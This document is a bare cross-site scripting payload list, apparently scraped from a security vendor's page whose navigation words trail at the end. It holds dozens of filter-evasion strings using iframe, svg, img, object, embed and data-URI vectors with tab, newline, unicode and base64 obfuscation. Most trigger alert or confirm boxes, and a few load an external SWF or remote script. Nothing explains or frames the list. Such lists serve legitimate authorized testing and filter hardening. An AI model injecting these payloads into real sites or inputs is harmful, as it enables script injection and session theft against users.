<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
http://www.<script>alert(1)</script .com
<iframe
src=j
	a
		v
			a&NewLin
e;				s
					c
	
					r
							i&
NewLine;								p
		&Tab
;						t
						&
Tab;			:a
							&
Tab;			l
								&Ta
b;			e
									
				r
								&T
ab;					t
						&Tab
;								28
				
												1
&T
ab;													&Tab
;		%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l
	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
"></object>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"
allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\
u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
worksinIE>
u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\
<script/src=data:text/j\u0061v\
u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<svg><script>//
confirm(1);</script </svg>
href=javascript:alert(1)>ClickMe
<div/onmouseover='alert(1)'> style="x:">
<script/src=data:text/
javascript,al&
#x0065;rt(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C
%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src&#
61"http://sternefa

9ily.net/foo.js"><&
#47script>​">Click Me</a>
Vulnerabilities
Customers
OrganizationsTestersDevelopers
Company
Insights